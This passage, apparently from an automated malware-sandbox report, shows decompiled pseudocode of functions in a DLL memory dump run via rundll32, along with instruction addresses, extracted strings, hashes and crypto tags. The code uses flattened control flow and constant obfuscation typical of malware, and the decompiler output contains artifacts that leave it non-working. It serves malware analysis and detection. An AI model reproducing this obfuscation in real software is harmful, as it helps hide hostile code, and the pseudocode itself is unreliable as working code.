										E10008C0C( *(_t466 + 0x70), __eflags,  *(_t466 + 0x18),  *(_t466 + 0x94), _t466 + 0xc0);
										_t400 = E10001E13( *(_t466 + 0x38),  *(_t466 + 0x30),  *(_t466 + 0x70),  *((intOrPtr*)(_t466 + 0xb8)), _t466 + 0xcc);
										_t466 = _t466 + 0x18;
										_t460 = 0x5d953cf;
										 *_t400 = 0;
										continue;
									} else {
										if(_t460 == 0x2c6b1ef9) {
											_push( *((intOrPtr*)(_t466 + 0x4d4)));
											_push( *(_t466 + 0x84));
											E100164EC( *((intOrPtr*)(_t466 + 0xbc)), __eflags, E1001BF25( *(_t466 + 0x7c),  *(_t466 + 0x60), __eflags),  *((intOrPtr*)(_t466 + 0xcc)), 0x104, _t466 + 0x2e0, _t466 + 0xd0,  *(_t466 + 0x5c),  *(_t466 + 0x94),  *(_t466 + 0x44));
											E1001C5F7( *(_t466 + 0x68),  *(_t466 + 0x58),  *(_t466 + 0x84),  *(_t466 + 0x98), _t401);
											_t466 = _t466 + 0x34;
											_t460 = 0x1c525ebd;
											continue;
										} else {
											if(_t460 != 0x35123284) {
												goto L16;
											} else {
												E10001F8B( *((intOrPtr*)(_t464 + 4)),  *((intOrPtr*)(_t466 + 0xc4)),  *(_t466 + 0x38),  *((intOrPtr*)(_t466 + 0xb8)), _t464 + 4,  *(_t466 + 0x3c),  *((intOrPtr*)(_t466 + 0x20)), _t409, _t464 + 4,  *_t464);
												_t466 = _t466 + 0x20;
												_t460 = 0x4166320;
												_t457 =  !=  ? 1 : _t457;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E100078F0(_t409,  *(_t466 + 0x7c),  *(_t466 + 0xa4),  *(_t466 + 0x44),  *(_t466 + 0x68));
					_t466 = _t466 + 0xc;
					_t460 = 0x2a923978;
					L16:
					__eflags = _t460 - 0x2a923978;
				} while (__eflags != 0);
				L17:
				return _t457;
			}

0x1000262e
0x10002639
0x10002648
0x1000264a
0x10002651
0x10002658
0x1000265a
0x10002664
0x10002669
0x1000266e
0x10002676
0x1000267e
0x10002686
0x1000268e
0x10002696
0x1000269e
0x100026a6
0x100026ae
0x100026b3
0x100026bb
0x100026c9
0x100026ce
0x100026d4
0x100026dc
0x100026e4
0x100026f1
0x100026f4
0x100026f8
0x10002700
0x10002708
0x10002710
0x1000271b
0x10002723
0x1000272e
0x10002736
0x10002746
0x1000274a
0x10002752
0x1000275a
0x10002762
0x1000276f
0x10002770
0x10002774
0x10002779
0x10002781
0x10002789
0x10002791
0x10002799
0x100027a1
0x100027ac
0x100027b7
0x100027c2
0x100027ca
0x100027d2
0x100027d7
0x100027df
0x100027ed
0x100027f1
0x100027f9
0x100027fe
0x10002806
0x1000280e
0x10002818
0x1000281e
0x10002826
0x1000282e
0x10002836
0x1000283e
0x1000284c
0x10002851
0x10002857
0x1000285f
0x10002867
0x10002872
0x1000287d
0x10002888
0x1000289a
0x1000289d
0x100028a4
0x100028af
0x100028b7
0x100028bf
0x100028c7
0x100028cf
0x100028da
0x100028e5
0x100028f0
0x100028f8
0x10002900
0x10002905
0x1000290a
0x10002912
0x1000291a
0x1000291f
0x10002924
0x10002929
0x10002931
0x10002939
0x10002941
0x10002949
0x1000294e
0x10002956
0x10002966
0x1000296e
0x10002976
0x1000297e
0x10002986
0x1000298b
0x10002993
0x100029a6
0x100029ad
0x100029b8
0x100029c3
0x100029ce
0x100029d9
0x100029e1
0x100029e9
0x100029ee
0x100029f3
0x100029fb
0x10002a0e
0x10002a15
0x10002a20
0x10002a28
0x10002a30
0x10002a38
0x10002a43
0x10002a4b
0x10002a56
0x10002a5e
0x10002a66
0x10002a6b
0x10002a75
0x10002a80
0x10002a88
0x10002a93
0x10002a9b
0x10002aa6
0x10002aab
0x10002aaf
0x10002ab7
0x10002abf
0x10002aca
0x10002ad5
0x10002ae0
0x10002ae8
0x10002af0
0x10002afe
0x10002b03
0x10002b07
0x10002b0f
0x10002b1d
0x10002b22
0x10002b26
0x10002b2b
0x10002b33
0x10002b3b
0x10002b43
0x10002b4b
0x10002b50
0x10002b58
0x10002b63
0x10002b6b
0x10002b76
0x10002b7e
0x10002b86
0x10002b94
0x10002b9b
0x10002b9f
0x10002ba7
0x10002baf
0x10002bb4
0x10002bbc
0x10002bc4
0x10002bc4
0x10002bd6
0x10002da2
0x10002da9
0x00000000
0x10002bdc
0x10002be2
0x10002d84
0x00000000
0x10002be8
0x10002bee
0x10002d70
0x10002d72
0x10002d75
0x10002d78
0x10002d7a
0x00000000
0x10002d7a
0x10002bf4
0x10002bfa
0x10002cef
0x10002d0f
0x10002d14
0x10002d17
0x10002d1e
0x00000000
0x10002c00
0x10002c06
0x10002c53
0x10002c5a
0x10002caa
0x10002cc6
0x10002ccb
0x10002cce
0x00000000
0x10002c08
0x10002c0e
0x00000000
0x10002c14
0x10002c39
0x10002c40
0x10002c44
0x10002c4b
0x00000000
0x10002c4b
0x10002c0e
0x10002c06
0x10002bfa
0x10002bee
0x10002be2
0x00000000
0x10002bd6
0x10002dc8
0x10002dcd
0x10002dd0
0x10002dd5
0x10002dd5
0x10002dd5
0x10002de1
0x10002ded

Strings

E, xrefs: 10002AE0
l7, xrefs: 1000265A
#z, xrefs: 10002929
b-, xrefs: 10002A93
f_, xrefs: 10002806
5H, xrefs: 100028E5
rA, xrefs: 100029FB
m^, xrefs: 10002A56
(9, xrefs: 1000274A
dv, xrefs: 10002BA7
ZdP, xrefs: 100028F8
j, xrefs: 1000283E
z), xrefs: 10002781

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
API String ID: 0-500794611
Opcode ID: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction ID: 2f189fb40b88e7232357bad84871cb140e457652571658457e73c86c02e6a5c1
Opcode Fuzzy Hash: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction Fuzzy Hash: 7D021F715093819FE368CF21C98AA4FBBE1BBC4748F10891DE2D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10009CC8, Relevance: 16.5, Strings: 13, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10009CC8() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				intOrPtr _t232;
				void* _t233;
				intOrPtr _t236;
				void* _t246;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int* _t279;
				void* _t282;

				_t279 =  &_v612;
				_v532 = 0x572357;
				_v528 = 0x2f5978;
				_t270 = 0xf;
				_t277 = 0;
				_v524 = 0;
				_t246 = 0x31c11544;
				_v612 = 0x129f;
				_v612 = _v612 / _t270;
				_v612 = _v612 ^ 0xf442200a;
				_v612 = _v612 + 0x8904;
				_v612 = _v612 ^ 0xf442aa27;
				_v608 = 0x5b59;
				_t271 = 7;
				_v608 = _v608 / _t271;
				_v608 = _v608 ^ 0x00000d25;
				_v596 = 0x2567;
				_v596 = _v596 ^ 0xfa26aa3d;
				_v596 = _v596 << 0x10;
				_t272 = 0x51;
				_v596 = _v596 / _t272;
				_v596 = _v596 ^ 0x01c566ae;
				_v564 = 0x2177;
				_v564 = _v564 ^ 0x4051fc1c;
				_v564 = _v564 ^ 0xb5034854;
				_v564 = _v564 ^ 0xf552b9fc;
				_v552 = 0xa42c;
				_v552 = _v552 + 0xffff8520;
				_t273 = 0x36;
				_v552 = _v552 / _t273;
				_v552 = _v552 ^ 0x00005687;
				_v556 = 0x4d63;
				_v556 = _v556 ^ 0x23f659e6;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x3f617f89;
				_v548 = 0xc92c;
				_t274 = 0x1f;
				_v548 = _v548 / _t274;
				_v548 = _v548 | 0xd485f233;
				_v548 = _v548 ^ 0xd4858bcc;
				_v608 = 0x4780;
				_v608 = _v608 + 0xffff036b;
				_v608 = _v608 ^ 0xffff7b62;
				_v592 = 0xf0a1;
				_v592 = _v592 ^ 0x3b3a717c;
				_v592 = _v592 ^ 0x4319cb35;
				_v592 = _v592 + 0x4f8d;
				_v592 = _v592 ^ 0x78239a46;
				_v588 = 0x33cb;
				_v588 = _v588 * 0x50;
				_v588 = _v588 | 0x5a8f737f;
				_v588 = _v588 ^ 0x5a9f48d0;
				_v536 = 0x13fd;
				_v536 = _v536 * 5;
				_v536 = _v536 ^ 0x00004fad;
				_v600 = 0x5083;
				_v600 = _v600 ^ 0xb24ff3ec;
				_v600 = _v600 + 0xffff65b9;
				_t275 = 0x35;
				_v600 = _v600 * 0x36;
				_v600 = _v600 ^ 0x9cabf209;
				_v572 = 0x63e6;
				_v572 = _v572 << 3;
				_v572 = _v572 + 0x6ca3;
				_v572 = _v572 ^ 0x0003addb;
				_v540 = 0x1289;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00003929;
				_v544 = 0x5834;
				_v544 = _v544 ^ 0x9eb824c8;
				_v544 = _v544 ^ 0x9eb8689b;
				_v584 = 0x7c37;
				_v584 = _v584 * 0x74;
				_v584 = _v584 ^ 0x66bbdc02;
				_v584 = _v584 ^ 0x6683aa43;
				_v568 = 0x4cc0;
				_v568 = _v568 | 0x439ba37f;
				_v568 = _v568 + 0xffffbc9e;
				_v568 = _v568 ^ 0x439bbd6b;
				_v560 = 0x409b;
				_v560 = _v560 + 0x5a42;
				_v560 = _v560 + 0xabe3;
				_v560 = _v560 ^ 0x000101e3;
				_v612 = 0x62bf;
				_v612 = _v612 << 9;
				_v612 = _v612 + 0xffffd5ba;
				_v612 = _v612 ^ 0xe652b9b2;
				_v612 = _v612 ^ 0xe697c132;
				_v576 = 0x7077;
				_t276 = _v608;
				_v576 = _v576 / _t275;
				_v576 = _v576 * 5;
				_v576 = _v576 ^ 0x00006027;
				_v580 = 0x9a4a;
				_v580 = _v580 + 0x4b3e;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x396d003f;
				goto L1;
				do {
					while(1) {
						L1:
						_t282 = _t246 - 0x31c11544;
						if(_t282 > 0) {
							break;
						}
						if(_t282 == 0) {
							_push(_t246);
							_t236 = E100157E8(0x440);
							 *0x100221b0 = _t236;
							__eflags = _t236;
							if(__eflags == 0) {
								L23:
								return _t277;
							}
							 *((intOrPtr*)(_t236 + 0x21c)) = E100094EC;
							_t246 = 0x30823c81;
							continue;
						}
						if(_t246 == 0x687b4fe) {
							_v604 = 0xf298;
							_t246 = 0x37d3e938;
							_v604 = _v604 + 0xbb6f;
							_v604 = _v604 ^ 0x0001ae2e;
							continue;
						}
						if(_t246 == 0x8847984) {
							E10008C0C(_v584, __eflags, _v568, _v560,  &_v520);
							 *((intOrPtr*)( *0x100221b0 + 0xc)) = E1001C424( &_v520, _v576);
							goto L23;
						}
						if(_t246 == 0x2aee8ed5) {
							_v604 = 0xdb1c;
							_t246 = 0x3b385d06;
							_v604 = _v604 | 0xf22f27d0;
							_v604 = _v604 ^ 0xf22fffc0;
							 *((intOrPtr*)( *0x100221b0 + 0x220)) = E10017A42;
							continue;
						}
						if(_t246 != 0x30823c81) {
							goto L20;
						}
						_t276 = E1000DA66(_v580, _t267, _v552, _t246, _v556);
						_t279 =  &(_t279[3]);
						if(_t276 == 0) {
							_t246 = 0x2aee8ed5;
						} else {
							 *((intOrPtr*)( *0x100221b0 + 0x22c)) = 1;
							_t246 = 0x687b4fe;
						}
					}
					__eflags = _t246 - 0x37d3e938;
					if(_t246 == 0x37d3e938) {
						_t267 = _t276;
						E1001F23C(_v548, _t276, _v608, _v592, _v588);
						_t279 =  &(_t279[3]);
						_t246 = 0x3b385d06;
						goto L20;
					}
					__eflags = _t246 - 0x3b385d06;
					if(_t246 == 0x3b385d06) {
						_push(_t246);
						_t198 =  &_v600; // 0x6027
						_t267 = _v536;
						_t232 = E10001D54(_v536, _t246,  *_t198, _v572, _v540,  *0x100221b0 + 0x234, _v544, _v604);
						_t279 =  &(_t279[8]);
						_t246 = 0x3b59d612;
						__eflags = _t232;
						_t233 = 1;
						_t277 =  ==  ? _t233 : _t277;
						goto L1;
					}
					__eflags = _t246 - 0x3b59d612;
					if(_t246 != 0x3b59d612) {
						goto L20;
					}
					E10007605();
					_t246 = 0x8847984;
					goto L1;
					L20:
					__eflags = _t246 - 0x393fa17b;
				} while (__eflags != 0);
				goto L23;
			}

0x10009cc8
0x10009cce
0x10009cd8
0x10009ce6
0x10009ce7
0x10009cee
0x10009cf2
0x10009cf4
0x10009d04
0x10009d0a
0x10009d12
0x10009d1a
0x10009d22
0x10009d2e
0x10009d33
0x10009d39
0x10009d41
0x10009d49
0x10009d51
0x10009d5a
0x10009d5f
0x10009d65
0x10009d6d
0x10009d75
0x10009d7d
0x10009d85
0x10009d8d
0x10009d95
0x10009da1
0x10009da6
0x10009dac
0x10009db4
0x10009dbc
0x10009dc4
0x10009dc9
0x10009dd1
0x10009ddd
0x10009de0
0x10009de4
0x10009dec
0x10009df4
0x10009dfc
0x10009e04
0x10009e0c
0x10009e14
0x10009e1c
0x10009e24
0x10009e2c
0x10009e34
0x10009e41
0x10009e45
0x10009e4d
0x10009e55
0x10009e62
0x10009e66
0x10009e6e
0x10009e78
0x10009e85
0x10009e94
0x10009e95
0x10009e99
0x10009ea1
0x10009ea9
0x10009eae
0x10009eb6
0x10009ebe
0x10009ec6
0x10009eca
0x10009ed2
0x10009eda
0x10009ee2
0x10009eea
0x10009ef7
0x10009efb
0x10009f03
0x10009f0b
0x10009f13
0x10009f1b
0x10009f23
0x10009f2b
0x10009f33
0x10009f3b
0x10009f43
0x10009f4b
0x10009f53
0x10009f58
0x10009f60
0x10009f68
0x10009f70
0x10009f7e
0x10009f82
0x10009f8b
0x10009f8f
0x10009f97
0x10009f9f
0x10009fa7
0x10009fac
0x10009fac
0x10009fb4
0x10009fb4
0x10009fb4
0x10009fb4
0x10009fb6
0x00000000
0x00000000
0x10009fbc
0x1000a07d
0x1000a083
0x1000a088
0x1000a08e
0x1000a090
0x1000a16a
0x1000a175
0x1000a175
0x1000a096
0x1000a0a0
0x00000000
0x1000a0a0
0x10009fc8
0x1000a053
0x1000a05b
0x1000a060
0x1000a068
0x00000000
0x1000a068
0x10009fd4
0x1000a147
0x1000a166
0x00000000
0x1000a166
0x10009fe0
0x1000a025
0x1000a02d
0x1000a02f
0x1000a037
0x1000a044
0x00000000
0x1000a044
0x10009fe8
0x00000000
0x00000000
0x1000a000
0x1000a002
0x1000a007
0x1000a01e
0x1000a009
0x1000a011
0x1000a017
0x1000a017
0x1000a007
0x1000a0aa
0x1000a0b0
0x1000a110
0x1000a11e
0x1000a123
0x1000a126
0x00000000
0x1000a126
0x1000a0b2
0x1000a0b4
0x1000a0cd
0x1000a0e9
0x1000a0ed
0x1000a0f2
0x1000a0f7
0x1000a0fa
0x1000a0ff
0x1000a103
0x1000a104
0x00000000
0x1000a104
0x1000a0b6
0x1000a0bc
0x00000000
0x00000000
0x1000a0be
0x1000a0c3
0x00000000
0x1000a128
0x1000a128
0x1000a128
0x00000000

Strings

>K, xrefs: 10009F9F
7|, xrefs: 10009EEA
?, xrefs: 10009FAC
|q:;, xrefs: 10009E14
W#W, xrefs: 10009CCE
c, xrefs: 10009EA1
4X, xrefs: 10009ED2
%, xrefs: 10009D39
xY/, xrefs: 10009CD8
cM, xrefs: 10009DB4
'`?, xrefs: 1000A0E9
BZ, xrefs: 10009F33
)9, xrefs: 10009ECA

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
API String ID: 0-1474617872
Opcode ID: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
Instruction ID: ba7fc6154232bfd8db280ed454fca39f84720541494348eac49d9c349cc68150
Opcode Fuzzy Hash: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
Instruction Fuzzy Hash: C8B121B15093819FE358CF65C58981BFBE1FBC5788F104A1DF596862A0C3B98A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100106C2, Relevance: 15.4, Strings: 12, Instructions: 383
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E100106C2(intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v1;
				char _v96;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				void* _t345;
				intOrPtr _t372;
				void* _t379;
				signed int _t383;
				void* _t391;
				intOrPtr* _t399;
				char _t404;
				intOrPtr* _t410;
				char* _t433;
				char* _t436;
				signed int _t437;
				intOrPtr* _t440;
				signed int* _t442;
				void* _t445;

				_t399 = _a12;
				_push(_t399);
				_push(_a8);
				_t440 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t345);
				_v120 = 0x55e52e;
				_v112 = 0;
				_t442 =  &(( &_v288)[5]);
				_v116 = 0x6a087e;
				_v148 = 0x434e;
				_t437 = 0x13292eb2;
				_v148 = _v148 + 0xffff9485;
				_v148 = _v148 ^ 0xffffd793;
				_v156 = 0xec79;
				_v156 = _v156 ^ 0xb43b0e66;
				_v156 = _v156 ^ 0xb43be21d;
				_v200 = 0xee7d;
				_v200 = _v200 | 0x0533a7d7;
				_v200 = _v200 + 0xfffff45a;
				_v200 = _v200 ^ 0x05338944;
				_v216 = 0x86ca;
				_v216 = _v216 + 0x54b4;
				_v216 = _v216 ^ 0xa0eca1d2;
				_v216 = _v216 ^ 0xa0ec1e31;
				_v232 = 0x5704;
				_v232 = _v232 + 0x87d6;
				_push(0x16);
				_v164 = 0;
				_push(7);
				_v232 = _v232 / 0;
				_v232 = _v232 >> 5;
				_v232 = _v232 ^ 0x000017c2;
				_v240 = 0x5173;
				_v240 = _v240 * 0x25;
				_v240 = _v240 << 0xa;
				_v240 = _v240 / 0;
				_v240 = _v240 ^ 0x06ba4efb;
				_v248 = 0xc74b;
				_v248 = _v248 * 0x7e;
				_v248 = _v248 + 0xffff822f;
				_v248 = _v248 * 0x4c;
				_v248 = _v248 ^ 0x1cf92e4a;
				_v256 = 0x686e;
				_v256 = _v256 * 0x12;
				_v256 = _v256 ^ 0xf8fdd26c;
				_v256 = _v256 * 0x52;
				_v256 = _v256 ^ 0xc03ea1b3;
				_v244 = 0x2add;
				_v244 = _v244 << 0xf;
				_v244 = _v244 + 0xffffde04;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0x6e5e34dd;
				_v284 = 0xf4e0;
				_v284 = _v284 + 0xba09;
				_v284 = _v284 | 0xa2bb5836;
				_v284 = _v284 >> 2;
				_v284 = _v284 ^ 0x28aee5c9;
				_v168 = 0x9f31;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x000048ec;
				_v220 = 0x7e53;
				_v220 = _v220 << 6;
				_v220 = _v220 * 0x50;
				_v220 = _v220 ^ 0x09de0db5;
				_v188 = 0x17a8;
				_v188 = _v188 + 0x52a9;
				_v188 = _v188 / 0;
				_v188 = _v188 ^ 0x00004610;
				_v196 = 0x5cc1;
				_v196 = _v196 + 0xffff31d1;
				_v196 = _v196 | 0xc97284eb;
				_v196 = _v196 ^ 0xffffe02f;
				_v172 = 0xda7e;
				_v172 = _v172 << 0xe;
				_v172 = _v172 ^ 0x369fe494;
				_v144 = 0xccad;
				_v144 = _v144 | 0x339a4d00;
				_v144 = _v144 ^ 0x339a877a;
				_v288 = 0xfcaa;
				_v288 = _v288 << 2;
				_v288 = _v288 + 0x9909;
				_v288 = _v288 << 0xc;
				_v288 = _v288 ^ 0x48bb2562;
				_v152 = 0x61b7;
				_v152 = _v152 << 0x10;
				_v152 = _v152 ^ 0x61b70a03;
				_v140 = 0xc302;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x61816c1a;
				_v160 = 0x48ef;
				_v160 = _v160 ^ 0xebfd6bf9;
				_v160 = _v160 ^ 0xebfd7750;
				_v260 = 0x5362;
				_v260 = _v260 >> 6;
				_t404 = 0x6c;
				_v260 = _v260 / 0;
				_v260 = _v260 ^ 0xee3aff63;
				_v260 = _v260 ^ 0xee3aef31;
				_v236 = 0xd35f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 + 0x2900;
				_v236 = _v236 + 0x50af;
				_v236 = _v236 ^ 0xd35f0d2f;
				_v212 = 0x828e;
				_v212 = _v212 | 0x8b388828;
				_v212 = _v212 * 0xa;
				_v212 = _v212 ^ 0x70352860;
				_v228 = 0xeb91;
				_v228 = _v228 ^ 0xa86be6f8;
				_v228 = _v228 + 0xffff5277;
				_v228 = _v228 ^ 0xa86a6f69;
				_v184 = 0xae04;
				_v184 = _v184 + 0xffff62af;
				_v184 = _v184 ^ 0x0000117e;
				_v224 = 0x33a1;
				_v224 = _v224 >> 1;
				_v224 = _v224 >> 7;
				_v224 = _v224 ^ 0x00005b9c;
				_v268 = 0xe65;
				_v268 = _v268 * 0x1a;
				_v268 = _v268 >> 2;
				_v268 = _v268 >> 5;
				_v268 = _v268 ^ 0x00000bed;
				_v176 = 0xa4d1;
				_v176 = _v176 | 0x37797fb5;
				_v176 = _v176 ^ 0x3779d180;
				_v252 = 0x4dfa;
				_v252 = _v252 >> 0xf;
				_v252 = _v252 ^ 0x7040ff32;
				_v252 = _v252 ^ 0x70408cc6;
				_v276 = 0x9261;
				_v276 = _v276 ^ 0x928292e1;
				_v276 = _v276 + 0xbfd3;
				_v276 = _v276 >> 0xd;
				_v276 = _v276 ^ 0x0004a09c;
				_v192 = 0x5c67;
				_v192 = _v192 << 4;
				_v192 = _v192 >> 0xf;
				_v192 = _v192 ^ 0x00002cc8;
				_v204 = 0xa9b8;
				_v204 = _v204 << 5;
				_v204 = _v204 + 0xffff3dee;
				_v204 = _v204 ^ 0x0014203e;
				_v180 = 0xc206;
				_v180 = _v180 * 0x36;
				_v180 = _v180 ^ 0x0028c8dc;
				_v280 = 0x96db;
				_v280 = _v280 + 0xeb7e;
				_v280 = _v280 >> 7;
				_v280 = _v280 ^ 0x33900b7e;
				_v280 = _v280 ^ 0x33901db2;
				_v208 = 0xb5f5;
				_v208 = _v208 >> 6;
				_v208 = _v208 + 0xfc0c;
				_v208 = _v208 ^ 0x0000fee2;
				_t436 = _v132;
				while(1) {
					L1:
					_t427 = _v264;
					_t365 = _v272;
					while(1) {
						_t445 = _t437 - 0x19192d48;
						if(_t445 > 0) {
							goto L23;
						}
						L3:
						if(_t445 == 0) {
							_v124 = _t404;
							_t379 = E100105E8( &_v108,  *((intOrPtr*)( *0x100221b4 + 0x14)), _v148, _v212, _v228, _v184, _v224, _v208,  *((intOrPtr*)( *0x100221b4)),  &_v124);
							_t442 =  &(_t442[8]);
							if(_t379 == 0) {
								_t437 = 0x272c22c8;
							} else {
								_t410 =  &_v1;
								_t433 = _t436;
								do {
									 *_t433 =  *_t410;
									_t433 = _t433 + 1;
									_t410 = _t410 - 1;
								} while (_t410 >=  &_v96);
								_t437 = 0xe3e0850;
							}
							goto L9;
						} else {
							if(_t437 == 0x95d06e9) {
								_t383 = _a4 + 1;
								if((_t383 & 0x0000000f) != 0) {
									_t383 = (_t383 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t399 + 4)) = _t383 + 0x74;
								_push(_t404);
								_t436 = E100157E8( *((intOrPtr*)(_t399 + 4)));
								 *_t399 = _t436;
								if(_t436 == 0) {
									goto L34;
								}
								_t305 = _t436 + 0x74; // 0x74
								_t427 = _t305;
								_t365 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								_v264 = _t305;
								_t437 = 0x154603b2;
								_v132 = _a4;
								_v272 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								goto L10;
							} else {
								if(_t437 == 0xe3e0850) {
									_v128 = 0x14;
									_t391 = E10007471(_v156, _v268, _v176, _v252,  &_v128, _v276, _t436 + 0x60, _t404, _v192, _v136);
									_t427 = _v264;
									_t442 =  &(_t442[8]);
									_t365 = _v272;
									_t404 = 0x6c;
									if(_t391 == 0) {
										continue;
									} else {
										_t437 = 0x272c22c8;
										_v164 = 1;
										goto L9;
									}
								} else {
									if(_t437 == 0x13292eb2) {
										_t437 = 0x95d06e9;
										continue;
									} else {
										if(_t437 != 0x154603b2) {
											L30:
											if(_t437 == 0x4324b34) {
												L34:
												return _v164;
											}
											goto L1;
										} else {
											_t280 =  &_v284; // 0xee3aef31
											E1000CB42(_v244,  *_t280, _v168, _t404,  &_v136,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t404, _v220);
											_t442 =  &(_t442[6]);
											asm("sbb esi, esi");
											_t437 = (_t437 & 0xeb9139e0) + 0x306f06ef;
											L9:
											_t365 = _v272;
											_t427 = _v264;
											L10:
											_t404 = 0x6c;
											while(1) {
												_t445 = _t437 - 0x19192d48;
												if(_t445 > 0) {
													goto L23;
												}
												goto L3;
											}
											goto L23;
										}
									}
								}
							}
						}
						L24:
						if(_t437 == 0x272c22c8) {
							_push(_t404);
							E1000D7B0(_v136);
							_t437 = 0x306f06ef;
							goto L9;
						}
						if(_t437 != 0x306f06ef) {
							if(_t437 != 0x31bcf33d) {
								goto L30;
							} else {
								E1001413E(_v144, _v288, _v152, _v140, _v160,  &_v132, _t427,  *((intOrPtr*)( *0x100221b4)),  &_v132, _v260, _v136, _t365, _v236,  &_v132);
								_t442 =  &(_t442[0xc]);
								asm("sbb esi, esi");
								_t437 = (_t437 & 0xf1ed0a80) + 0x272c22c8;
								goto L9;
							}
						}
						_t372 = _v164;
						if(_t372 == 0) {
							E100091CD(_v232, _v240, _v248,  *_t399, _v256);
							goto L34;
						}
						return _t372;
						L23:
						if(_t437 == 0x1c0040cf) {
							E10009970(_v188,  *_t440, _v196, _t427, _a4, _v172);
							_t442 =  &(_t442[4]);
							_t437 = 0x31bcf33d;
							_t404 = 0x6c;
							goto L30;
						}
						goto L24;
					}
				}
			}

0x100106c9
0x100106d3
0x100106d4
0x100106db
0x100106dd
0x100106e4
0x100106e5
0x100106e6
0x100106eb
0x100106f8
0x100106ff
0x10010702
0x1001070f
0x1001071a
0x1001071f
0x1001072a
0x10010735
0x10010740
0x1001074b
0x10010756
0x1001075e
0x10010766
0x1001076e
0x10010776
0x1001077e
0x10010786
0x1001078e
0x10010796
0x1001079e
0x100107aa
0x100107ac
0x100107b6
0x100107b8
0x100107be
0x100107c3
0x100107cb
0x100107d9
0x100107dd
0x100107e8
0x100107ec
0x100107f4
0x10010801
0x10010805
0x10010812
0x10010816
0x1001081e
0x1001082b
0x1001082f
0x1001083c
0x10010840
0x10010848
0x10010850
0x10010855
0x1001085d
0x10010862
0x1001086a
0x10010872
0x1001087a
0x10010882
0x10010887
0x1001088f
0x1001089a
0x100108a2
0x100108ad
0x100108b7
0x100108c3
0x100108c7
0x100108cf
0x100108d7
0x100108e7
0x100108eb
0x100108f3
0x100108fb
0x10010903
0x1001090b
0x10010913
0x1001091e
0x10010926
0x10010931
0x1001093c
0x10010947
0x10010952
0x1001095a
0x1001095f
0x10010967
0x1001096c
0x10010974
0x1001097f
0x10010987
0x10010992
0x1001099d
0x100109a5
0x100109b0
0x100109bb
0x100109c6
0x100109d1
0x100109d9
0x100109e2
0x100109e5
0x100109e9
0x100109f1
0x100109f9
0x10010a01
0x10010a06
0x10010a0e
0x10010a16
0x10010a1e
0x10010a26
0x10010a33
0x10010a37
0x10010a3f
0x10010a47
0x10010a4f
0x10010a57
0x10010a5f
0x10010a67
0x10010a6f
0x10010a77
0x10010a7f
0x10010a83
0x10010a88
0x10010a90
0x10010a9d
0x10010aa1
0x10010aa6
0x10010aab
0x10010ab3
0x10010abe
0x10010ac9
0x10010ad4
0x10010adc
0x10010ae9
0x10010af1
0x10010af9
0x10010b01
0x10010b09
0x10010b11
0x10010b16
0x10010b1e
0x10010b26
0x10010b2b
0x10010b30
